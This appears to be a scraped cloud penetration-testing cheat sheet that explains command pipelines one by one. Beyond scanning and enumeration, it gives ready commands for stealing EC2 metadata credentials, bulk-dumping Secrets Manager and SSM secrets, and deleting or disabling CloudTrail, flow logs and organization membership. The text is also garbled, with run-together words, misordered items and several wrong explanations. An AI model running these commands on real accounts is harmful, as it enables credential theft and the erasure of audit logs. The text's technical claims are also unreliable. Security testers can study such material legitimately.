nuclei -t ~/nuclei-templates/ -severity high,medium -tags misconfiguration: This command uses thenucleitool to perform vulnerability scanning or detection on the subdomains obtained from the previous command. The-toption specifies the path to the Nuclei templates directory (~/nuclei-templates/), which contains predefined templates for identifying security issues. The-severityoption is used to specify the severity level of vulnerabilities to be detected, in this case, “high” and “medium.” The-tagsoption is used to filter templates with specific tags, in this case, “misconfiguration.”
subfinder -d example.com: This command uses thesubfindertool to perform subdomain enumeration (-d) onexample.com. It searches for subdomains associated with the specified domain and prints the results to the output.
httpx -silent: This command uses thehttpxtool to make HTTP requests to the subdomains obtained from the previous command. The-silentoption is used to suppress verbose output, resulting in a cleaner output.
gf misconfig: This command uses thegftool with themisconfigpattern to search for potential misconfiguration issues in the HTTP responses. Thegftool allows you to filter and extract data based on predefined patterns.
grep -E "(deployment|configuration management)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.
Inadequate Incident Response and Recovery
aws ec2 describe-instances: This command uses the AWS CLI (aws) to retrieve information about EC2 instances by executing thedescribe-instancesAPI call. It provides details about the instances running in the specified AWS account.
jq -r '.Reservations[].Instances[] | select(.State.Name!="terminated") | select(.State.Name!="shutting-down") | select(.State.Name!="stopping") | select(.State.Name!="stopped") | select(.State.Name!="running")': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query filters instances based on their state, excluding instances that are terminated, shutting down, stopping, stopped, or running.
grep -iE "(incident response|recovery)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
az vm list --output json: This command uses the Azure CLI (az) to retrieve a list of virtual machines (VMs) by executing thevm listcommand. The--output jsonoption specifies the output format as JSON.
jq '.[] | select(.powerState != "stopped" and .powerState != "deallocated")': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects VMs that have apowerStatedifferent from “stopped” and “deallocated”, meaning they are in an active or running state.
grep -iE "(incident response|recovery)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
gcloud compute instances list --format json: This command uses the Google Cloud SDK (gcloud) to retrieve a list of compute instances by executing thecompute instances listcommand. The--format jsonoption specifies the output format as JSON.
jq '.[] | select(.status != "TERMINATED") | select(.status != "STOPPING") | select(.status != "SUSPENDED")': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects instances that have astatusdifferent from “TERMINATED”, “STOPPING”, or “SUSPENDED”, meaning they are in an active or running state.
grep -iE "(incident response|recovery)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “incident response” or “recovery” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
Shared Technology Vulnerabilities
nmap -p0-65535: This command starts thenmaptool with the specified options to scan all ports from 0 to 65535 on the target system.
--script vulners,vulscan: This option instructsnmapto use thevulnersandvulscanscripts for vulnerability scanning. These scripts are part of the Nmap Scripting Engine (NSE) and help identify potential vulnerabilities in the target system.
--script-args vulscanoutput=gnmap: This option specifies additional arguments for the selected scripts. In this case, it sets thevulscanoutputargument tognmap, which specifies the output format for thevulscanscript asgnmap.
-oN -: This option redirects the output of thenmapcommand to the standard output (stdout) instead of saving it to a file.
<target>: This is a placeholder for the target IP address or hostname. The actual target should be provided in place of<target>.
grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command pipes the output of thenmapcommand intogrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-ioption).
java -jar burpsuite_pro.jar --project-file=<project_file> --unpause-spider-and-scanner --scan-checks --results-dir=<output_directory>: This command executes the Burp Suite Professional edition by running the JAR file (burpsuite_pro.jar) using Java. The--project-fileoption specifies the path to a Burp Suite project file, which contains configuration settings and previous scan results. The--unpause-spider-and-scanneroption unpauses the spider and scanner modules to start the crawling and vulnerability scanning process. The--scan-checksoption enables all active scanning checks. The--results-diroption specifies the directory where the scan results will be saved.
grep -iE "(shared technology|underlying infrastructure|hypervisor)" <output_directory>/*.xml: This command usesgrepto search for lines that match the specified extended regular expression (-E) within XML files in the specified output directory. The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-ioption).
omp -u <username> -w <password> --xml="<get_results task_id='<task_id>'/>": This command uses the OpenVAS Management Protocol (OMP) tool to retrieve scan results. The-uoption specifies the username,-woption specifies the password, and--xmloption specifies the XML command to send to the OpenVAS server. The<get_results task_id='<task_id>'/>XML command requests the scan results for a specific task ID.
grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
Account Hijacking and Abuse
aws iam list-users: This command uses the AWS CLI (aws) to list all IAM users in the AWS account by executing theiam list-usersAPI call. It retrieves information about the IAM users.
jq -r '.Users[] | select(.PasswordLastUsed == null)': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects IAM users that have aPasswordLastUsedvalue equal tonull, indicating that they have never used a password to authenticate.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
az ad user list --output json: This command uses the Azure CLI (az) to list all Azure Active Directory (AD) users in the current directory by executing thead user listcommand. The--output jsonoption specifies the output format as JSON.
jq '.[] | select(.passwordLastChanged == null)': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects AD users that have apasswordLastChangedvalue equal tonull, indicating that they have never changed their password.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
gcloud auth list --format=json: This command uses the Google Cloud SDK (gcloud) to list all authenticated accounts in the current configuration. The--format=jsonoption specifies the output format as JSON.
jq -r '.[] | select(.status == "ACTIVE") | select(.credential_last_refreshed_time.seconds == null)': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects authenticated accounts that have an “ACTIVE” status and acredential_last_refreshed_time.secondsvalue equal tonull, indicating that their credentials have not been refreshed.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The-ioption enables case-insensitive matching.
Retrieve EC2 Password Data
aws ec2 describe-instances --query 'Reservations[].Instances[].{InstanceId: InstanceId, State: State.Name, PasswordData: PasswordData}': This command uses the AWS CLI (aws) to describe EC2 instances in the AWS account. The--queryoption specifies a custom query to retrieve specific attributes for each instance, including the instance ID, state, and password data.
jq -r '.[] | select(.State == "running") | select(.PasswordData != null) | {InstanceId: .InstanceId, PasswordData: .PasswordData}': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that are in the “running” state and have non-null password data. It constructs a new JSON object containing the instance ID and password data.
grep -i "RDP": This command usesgrepto search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command runs thecloudmapper.pyscript to collect AWS account data for the specified<account_name>in the specified regions (<region1,region2>). It gathers information about the account’s resources and configurations.
python cloudmapper.py --account <account_name> enum --services ec2 --region <region1,region2>: This command runs thecloudmapper.pyscript to perform enumeration on the specified AWS account (<account_name>) and target the EC2 service in the specified regions (<region1,region2>). It focuses on gathering information specifically related to EC2 instances.
jq -r '.EC2[] | select(.password_data != null) | {InstanceId: .instance_id, PasswordData: .password_data}': This command usesjqto filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that have non-nullpassword_dataand constructs a new JSON object containing the instance ID and password data.
grep -i "RDP": This command usesgrepto search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
python pacu.py: This command executes thepacu.pyscript, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
--no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
--profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The<profile_name>should correspond to a configured AWS profile containing valid credentials.
--module ec2__get_password_data: This option specifies the specific PACU module to run. In this case, it runs theec2__get_password_datamodule, which retrieves password data for EC2 instances.
--regions <region1,region2>: This option specifies the AWS regions to target. The<region1,region2>values represent a comma-separated list of regions where theec2__get_password_datamodule will be executed.
--identifier "RDP": This option configures an identifier for the module. In this case, the identifier is set as “RDP”, indicating that the module will search for EC2 instances with password data related to RDP (Remote Desktop Protocol).
--json: This option instructs PACU to output the results in JSON format.
| grep -i "RDP": This part of the command usesgrepto search for lines that contain the case-insensitive string “RDP” within the JSON output generated by PACU. It filters the output to show only instances where the password data indicates the presence of RDP configuration.
Steal EC2 Instance Credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command sends an HTTP GET request to the specified URL, which is the metadata service endpoint on an EC2 instance. It retrieves a list of available IAM security credentials.
xargs -I {} curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{} | jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command usesxargsto process each item (IAM security credential) from the previous command and substitute it into the subsequent command.b.jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command usesjqto parse the JSON output obtained from the previous command and extract specific fields, namelyAccessKeyId,SecretAccessKey, andToken. The-roption outputs the results in raw (non-quoted) format.
a.curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command sends an HTTP GET request to retrieve the metadata of a specific IAM security credential.
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command executes theimds-helpertool with the specified URL as the argument. The tool interacts with the metadata service to retrieve information about IAM security credentials.
grep -E "AccessKeyId|SecretAccessKey|Token": This command usesgrepwith the-Eoption to perform a pattern match using an extended regular expression. It filters the output of theimds-helpercommand and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.
python pacu.py: This command executes thepacu.pyscript, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
--no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
--profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The<profile_name>should correspond to a configured AWS profile containing valid credentials.
--module imds__gather_credentials: This option specifies the specific PACU module to run. In this case, it runs theimds__gather_credentialsmodule, which collects IAM security credentials from the instance metadata service.
--json: This option instructs PACU to output the results in JSON format.
| grep -E "AccessKeyId|SecretAccessKey|Token": This part of the command usesgrepwith the-Eoption to perform a pattern match using an extended regular expression. It filters the JSON output generated by PACU and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.
Retrieve a High Number of Secrets Manager secrets
ccat: This command executes theccattool, which is used to syntax-highlight and display the contents of files or outputs in the terminal.
secretsmanager get-secret-value <secret_name>: This command specifies the AWS Secrets Manager operation to retrieve the value of a secret with the specified<secret_name>. The<secret_name>should correspond to the name or ARN (Amazon Resource Name) of the secret stored in AWS Secrets Manager.
aws secretsmanager list-secrets --query 'SecretList[].Name': This AWS CLI command lists the names of secrets stored in AWS Secrets Manager. The--queryparameter specifies the JSON path expression to retrieve only theNamefield of each secret.
jq -r '.[]': Thisjqcommand reads the JSON output from the previous command and extracts the values of theNamefield. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command usesxargsto process each secret name from the previousjqcommand and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by callingaws secretsmanager get-secret-valuewith the--secret-idparameter set to the current secret name.
jq -r '.SecretString': Thisjqcommand reads the JSON output from the previous AWS CLI command and extracts the value of theSecretStringfield. The-roption outputs the result in raw (non-quoted) format.
cf s3ls: This command is specific to the CloudFuzzer (CF) tool. It is used to list the objects within an Amazon S3 bucket.
<bucket_name>: This parameter specifies the name of the S3 bucket for which you want to list the objects. Replace<bucket_name>with the actual name of the bucket you want to query.
s3bucketbrute --bucket-prefixes <prefix_list> --region <region>: This command executes thes3bucketbrutetool, which is used for brute forcing or guessing the names of Amazon S3 buckets. The--bucket-prefixesoption specifies a list of bucket name prefixes to use in the brute force search, and the--regionoption specifies the AWS region where the buckets should be searched.
jq -r '.[].Name': Thisjqcommand reads the JSON output from the previous command and extracts the values of theNamefield for each discovered S3 bucket. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command usesxargsto process each bucket name from the previousjqcommand and substitute it into the subsequent AWS CLI command. It retrieves the value of the secret associated with each bucket by callingaws secretsmanager get-secret-valuewith the--secret-idparameter set to the current bucket name.
python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command executes the CloudMapper tool and instructs it to collect information about the specified AWS account (<account_name>) in the specified regions (<region1,region2>). Thecollectcommand gathers data about the account’s resources and configurations.
&&: This operator allows the subsequent command to be executed only if the previous command (python cloudmapper.py --account <account_name> collect --regions <region1,region2>) completes successfully.
python cloudmapper.py --account <account_name> enum --services secretsmanager --region <region1,region2>: This command continues the execution of CloudMapper and instructs it to enumerate secrets stored in AWS Secrets Manager for the specified account and regions. Theenumcommand focuses on the specified service (secretsmanager) and retrieves relevant information.
jq -r '.SecretsManager[] | {SecretId: .arn}': Thisjqcommand processes the JSON output from the previous CloudMapper command and extracts theSecretId(ARN) of each secret stored in AWS Secrets Manager. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command usesxargsto process each secret ARN obtained from the previousjqcommand and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by callingaws secretsmanager get-secret-valuewith the--secret-idparameter set to the current secret ARN.
Retrieve And Decrypt SSM Parameters
aws ssm describe-parameters --query 'Parameters[].Name': This AWS CLI command retrieves a list of parameter names from the SSM Parameter Store using thedescribe-parametersoperation. The--queryparameter specifies the JSON query to extract theNamefield from the response.
jq -r '.[]': Thisjqcommand processes the JSON output from the previous command and extracts the values of theNamefield for each parameter. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws ssm get-parameter --name {} --with-decryption: This command usesxargsto process each parameter name from the previousjqcommand and substitute it into the subsequent AWS CLI command. It retrieves the value of each parameter by callingaws ssm get-parameterwith the--nameparameter set to the current parameter name. The--with-decryptionoption is used to retrieve decrypted values if the parameter is encrypted.
jq -r '.Parameter.Value': Thisjqcommand processes the JSON output from the previousaws ssm get-parametercommand and extracts the value of the parameter. The-roption outputs the result in raw (non-quoted) format.
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command makes a request to the IMDS endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/) to retrieve the security credentials associated with the IAM role assigned to the EC2 instance. Theimds-helpertool facilitates the interaction with the IMDS.
jq -r '.[]': Thisjqcommand processes the JSON response from the previous command and extracts the values of all fields. The-roption outputs the results in raw (non-quoted) format.
xargs -I {}: This command sets up a placeholder{}that will be replaced with each value from the previousjqcommand.
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command usesimds-helperto make a request to the Instance Metadata Service (IMDS) endpoint with a placeholder{}` that will be replaced with a specific IAM role name. It retrieves the security credentials associated with the specified IAM role.
jq -r '.AccessKeyId': Thisjqcommand processes the JSON response from the previous command and extracts theAccessKeyIdfield from it. The-roption outputs the result in raw (non-quoted) format.
xargs -I {} aws sts assume-role --role-arn <role_arn> --role-session-name "bugbounty" --external-id <external_id> --region <region> --profile {}: This command usesxargsto substitute the IAM role name obtained from the previousjqcommand into the subsequentaws sts assume-rolecommand. It assumes the specified IAM role, generating temporary security credentials for the assumed role. The--role-arn,--role-session-name,--external-id,--region, and--profileoptions are provided to configure the role assumption.
jq -r '.Credentials.AccessKeyId, .Credentials.SecretAccessKey, .Credentials.SessionToken': Thisjqcommand processes the JSON response from the previousaws sts assume-rolecommand and extracts theAccessKeyId,SecretAccessKey, andSessionTokenfields from it. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws ssm describe-parameters --query 'Parameters[].Name' --region <region> --profile {}: This command usesxargsto substitute the IAM profile name obtained from the previousjqcommand into the subsequentaws ssm describe-parameterscommand. It retrieves a list of parameter names from AWS SSM Parameter Store. The--query,--region, and--profileoptions are provided to configure the command.
jq -r '.[]': Thisjqcommand processes the JSON response from the previousaws ssm describe-parameterscommand and extracts the values of the parameter names. The-roption outputs the results in raw (non-quoted) format.
xargs -I {} aws ssm get-parameter --name {} --with-decryption --region <region> --profile {}: This command usesxargsto substitute each parameter name obtained from the previousjqcommand into the subsequentaws ssm get-parametercommand. It retrieves the values of each parameter from AWS SSM Parameter Store. The--name,--with-decryption,--region, and--profileoptions are provided to configure the command.
jq -r '.Parameter.Value': Thisjqcommand processes the JSON response from the previousaws ssm get-parametercommand and extracts the values of the parameters. The-roption outputs the results in raw (non-quoted) format.
Delete CloudTrail Trail
aws cloudtrail delete-trail: This command is part of the AWS Command Line Interface (CLI) and is used to delete a CloudTrail trail.
--name <trail_name>: This option specifies the name of the CloudTrail trail to be deleted. Replace<trail_name>with the actual name of the trail you want to delete.
--region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace<region>with the appropriate AWS region code (e.g.,us-west-2,eu-central-1, etc.) where the trail exists.
By runningccat cloudtrail, the command will attempt to format and enhance the display of CloudTrail log files for better readability. It may apply syntax highlighting, indentation, or other visual enhancements to make the log content easier to analyze and interpret. This can be particularly useful when working with large or complex CloudTrail logs, as it helps highlight key information and improve overall readability.
python: This command is used to execute Python code from the command line.
-c "<code>": This option allows you to pass a string of Python code directly on the command line.
"import boto3; boto3.client('cloudtrail').delete_trail(Name='<trail_name>', RegionName='<region>')": This is the Python code being executed. It performs the following steps:
Imports theboto3library, which is the AWS SDK for Python.
Uses theboto3.client('cloudtrail')method to create a client object for interacting with the AWS CloudTrail service.
Calls thedelete_trail()method on the CloudTrail client, passing theNameandRegionNameparameters.
Replace<trail_name>with the actual name of the CloudTrail trail you want to delete, and<region>with the appropriate AWS region code.
terraform init: This command initializes a Terraform working directory by downloading the necessary provider plugins and setting up the environment.
terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing AWS CloudTrail resource into the Terraform state. The<trail_arn>should be replaced with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to import. By importing the resource, Terraform gains awareness of its existence and configuration.
terraform destroy -auto-approve: This command destroys the infrastructure defined in your Terraform configuration and removes any associated resources. The-auto-approveflag is used to automatically approve the destruction without requiring manual confirmation. This command will delete the CloudTrail resource that was imported in the previous step.
Disable CloudTrail Logging Through Event Selectors
aws cloudtrail put-event-selectors: This command is part of the AWS Command Line Interface (CLI) and is used to configure event selectors for an AWS CloudTrail trail.
--trail-name <trail_name>: This option specifies the name of the CloudTrail trail for which you want to configure event selectors. Replace<trail_name>with the actual name of the trail.
--event-selectors '[{"ReadWriteType": "ReadOnly"}]': This option specifies the event selectors to be configured for the CloudTrail trail. In this example, a single event selector is provided as a JSON array with a single object. The"ReadWriteType": "ReadOnly"indicates that the event selector should only capture read-only events. You can customize the event selector based on your specific requirements.
--region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace<region>with the appropriate AWS region code (e.g.,us-west-2,eu-central-1, etc.) where the trail exists.
python: This command is used to execute Python code from the command line.
-c "<code>": This option allows you to pass a string of Python code directly on the command line.
"import boto3; boto3.client('cloudtrail').put_event_selectors(TrailName='<trail_name>', EventSelectors=[{'ReadWriteType': 'ReadOnly'}], RegionName='<region>')": This is the Python code being executed. It performs the following steps:
Imports theboto3library, which is the AWS SDK for Python.
Uses theboto3.client('cloudtrail')method to create a client object for interacting with the AWS CloudTrail service.
Calls theput_event_selectors()method on the CloudTrail client, passing theTrailName,EventSelectors, andRegionNameparameters.
Replace<trail_name>with the actual name of the CloudTrail trail you want to configure, and<region>with the appropriate AWS region code.
TheEventSelectorsparameter is set as a list with a single dictionary object, specifying theReadWriteTypeasReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
terraform init: This command initializes the Terraform working directory, downloading any necessary provider plugins and setting up the environment.
terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing CloudTrail resource into the Terraform state. Theaws_cloudtrail.thisrefers to the Terraform resource representing the CloudTrail trail, and<trail_arn>is the ARN (Amazon Resource Name) of the CloudTrail trail you want to import. This step allows Terraform to manage the configuration of the existing resource.
terraform apply -auto-approve -var 'event_selector=[{read_write_type="ReadOnly"}]': This command applies the changes specified in the Terraform configuration to provision or update resources. The-auto-approveflag automatically approves the changes without asking for confirmation.
The-var 'event_selector=[{read_write_type="ReadOnly"}]'option sets the value of theevent_selectorvariable to configure the event selectors for the CloudTrail trail. In this example, a single event selector is provided as a list with a single dictionary object, specifying theread_write_typeasReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
CloudTrail Logs Impairment Through S3 Lifecycle Rule
aws s3api put-bucket-lifecycle: This command is used to configure the lifecycle policy for an S3 bucket.
--bucket <bucket_name>: Replace<bucket_name>with the actual name of the S3 bucket where you want to configure the lifecycle rule.
--lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}': This option specifies the configuration of the lifecycle rule. The configuration is provided as a JSON string. In this example, the configuration includes a single rule with the following properties:
Status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
--region <region>: Replace<region>with the appropriate AWS region code where the S3 bucket is located.
import boto3: This line imports the Boto3 library, which is the AWS SDK for Python.
s3 = boto3.client('s3'): This line creates a client object for the S3 service using the Boto3 library. This client object allows interaction with the S3 API.
s3.put_bucket_lifecycle_configuration(Bucket='<bucket_name>', LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}): This line invokes theput_bucket_lifecycle_configurationmethod of the S3 client to configure the lifecycle rule for the specified bucket.
Bucket='<bucket_name>': Replace<bucket_name>with the actual name of the S3 bucket where you want to configure the lifecycle rule.
LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}: This argument specifies the configuration of the lifecycle rule. It is provided as a dictionary with a single key, ‘Rules’, which maps to a list of rule dictionaries. In this example, there is a single rule with the following properties:
Status: Specifies the status of the rule. In this case, it is set to ‘Enabled’ to activate the rule.
Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
terraform init: This command initializes the Terraform working directory by downloading the necessary provider plugins and setting up the backend.
terraform import aws_s3_bucket.lifecycle <bucket_name>: This command imports an existing S3 bucket into Terraform as a resource. Replace<bucket_name>with the actual name of the S3 bucket you want to import. This step associates the existing bucket with the Terraform configuration.
terraform apply -auto-approve -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This command applies the Terraform configuration, deploying the resources defined in the Terraform files.
-auto-approve: This flag automatically approves the proposed changes without requiring manual confirmation.
-var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This flag sets a variable namedlifecycle_rulein the Terraform configuration. It specifies the configuration for the lifecycle rule using a list of one rule object. The rule object has the following properties:
status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (days=7).
Stop Cloud Trail Trail
--name <trail_name>: Specifies the name of the CloudTrail trail to stop logging. Replace<trail_name>with the actual name of the trail you want to stop logging for.
--region <region>: Specifies the AWS region where the CloudTrail trail is located. Replace<region>with the appropriate region identifier, such asus-east-1oreu-west-2.
import boto3: This imports the Boto3 library, which is the AWS SDK for Python.
boto3.client('cloudtrail'): This creates a client object for the CloudTrail service using Boto3.
.stop_logging(Name='<trail_name>', RegionName='<region>'): This invokes thestop_loggingmethod of the CloudTrail client to stop logging for a specific trail.
Name='<trail_name>': Specifies the name of the CloudTrail trail to stop logging for. Replace<trail_name>with the actual name of the trail you want to stop logging for.
RegionName='<region>': Specifies the AWS region where the CloudTrail trail is located. Replace<region>with the appropriate region identifier, such asus-east-1oreu-west-2.
terraform init: Initializes the Terraform working directory, downloading the necessary provider plugins and modules.
terraform import aws_cloudtrail.this <trail_arn>: Imports the existing CloudTrail resource into the Terraform state. Replace<trail_arn>with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to manage with Terraform.
terraform apply -auto-approve -var 'enable_logging=false': Applies the Terraform configuration, making changes to the infrastructure. The-auto-approveflag skips the interactive approval step, while the-varflag sets the variableenable_loggingtofalse. This variable is used in the Terraform configuration to control whether CloudTrail logging is enabled or disabled.
Attempt to Leave the AWS Organization
aws organizations deregister-account: This is the AWS CLI command to deregister an AWS account from an AWS Organization.
--account-id <account_id>: Specifies the ID of the AWS account you want to deregister. Replace<account_id>with the actual ID of the account you want to deregister.
--region <region>: Specifies the AWS region where the AWS Organizations service is located. Replace<region>with the appropriate region identifier, such asus-east-1oreu-west-2.
import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services.
boto3.client('organizations').deregister_account(AccountId='<account_id>'): Creates a client for the AWS Organizations service using Boto3 and calls thederegister_accountmethod on the client. TheAccountIdparameter should be replaced with the actual ID of the AWS account you want to deregister.
terraform init: Initializes the Terraform configuration in the current directory.
terraform import aws_organizations_account.this <account_id>: Imports an existing AWS account into Terraform. Theaws_organizations_account.thisresource represents an AWS account in the Terraform configuration, and<account_id>should be replaced with the actual ID of the AWS account you want to manage.
terraform apply -auto-approve -var 'enable_organization=false': Applies the Terraform configuration and provisions or updates resources. The-auto-approveflag automatically approves the execution without requiring user confirmation. The-var 'enable_organization=false'flag sets the value of theenable_organizationvariable tofalse, indicating that the AWS Organization should be disabled.
Remove VPC Flow Logs
aws ec2 delete-flow-logs: Executes the AWS CLI command to delete VPC flow logs.
--flow-log-ids <flow_log_ids>: Specifies the IDs of the flow logs to be deleted.<flow_log_ids>should be replaced with the actual IDs of the flow logs you want to delete.
--region <region>: Specifies the AWS region where the flow logs are located.<region>should be replaced with the appropriate region identifier, such asus-east-1oreu-west-2.
import boto3: Imports the Boto3 library, which is the official AWS SDK for Python.
ec2 = boto3.client('ec2'): Creates an EC2 client object using Boto3.
ec2.delete_flow_logs(FlowLogIds=['<flow_log_id_1>', '<flow_log_id_2>']): Calls thedelete_flow_logsmethod of the EC2 client to delete VPC flow logs. Replace<flow_log_id_1>and<flow_log_id_2>with the actual IDs of the flow logs you want to delete.
terraform init: Initializes the Terraform working directory by downloading the necessary provider plugins and configuring the backend.
terraform import aws_flow_log.this <flow_log_id>: Imports an existing VPC flow log into the Terraform state. Replace<flow_log_id>with the actual ID of the flow log you want to manage with Terraform. This command associates the flow log with the Terraform resource namedaws_flow_log.this.
terraform destroy -auto-approve: Destroys the Terraform-managed resources specified in the configuration files. The-auto-approveflag is used to automatically approve the destruction without requiring user confirmation.
Execute Discovery Commands on an EC2 Instance
cf: This is a command-line tool that provides simplified access to various AWS services and functionalities. It stands for “CloudFormation.”
aws ecs exec: This is a subcommand of thecftool specifically for interacting with AWS ECS.
-b: This flag is used to specify the task or container to execute the command in. It allows you to select a specific task or container within an ECS cluster.
aws ssm send-command: This is the AWS CLI command to interact with AWS Systems Manager and send a command.
--instance-ids <instance_id>: This option specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a comma-separated list of multiple instance IDs.
--document-name "AWS-RunShellScript": This option specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
--parameters '{"commands":["<command_1>", "<command_2>", "<command_3>"]}': This option specifies the parameters for the command. Thecommandsparameter is an array of shell commands to be executed on the instances.
--region <region>: This option specifies the AWS region where the instances are located.
import boto3: This imports the Boto3 library, which provides an interface to interact with AWS services using Python.
ssm = boto3.client('ssm'): This creates an SSM (Systems Manager) client object using theboto3.client()method. The client object allows interaction with AWS Systems Manager.
ssm.send_command(...): This invokes thesend_command()method of the SSM client to send a command to the specified instance(s).
InstanceIds=['<instance_id>']: This parameter specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a list of multiple instance IDs.
DocumentName='AWS-RunShellScript': This parameter specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
Parameters={'commands':['<command_1>', '<command_2>', '<command_3>']}: This parameter specifies the parameters for the command. Thecommandsparameter is a list of shell commands to be executed on the instances.
terraform init: This command initializes the Terraform working directory by downloading and configuring the necessary providers and modules.
terraform import aws_instance.this <instance_id>: This command imports an existing EC2 instance into the Terraform state. It associates the specified<instance_id>with theaws_instance.thisresource in the Terraform configuration.
terraform apply -auto-approve -var 'command="<command_1>; <command_2>; <command_3>"': This command applies the Terraform configuration and provisions or modifies the infrastructure as necessary. The-auto-approveflag skips the interactive approval prompt. The-varflag sets a variable namedcommandto the provided value, which represents a series of shell commands<command_1>; <command_2>; <command_3>to be executed on the EC2 instance.
Download EC2 Instance User Data
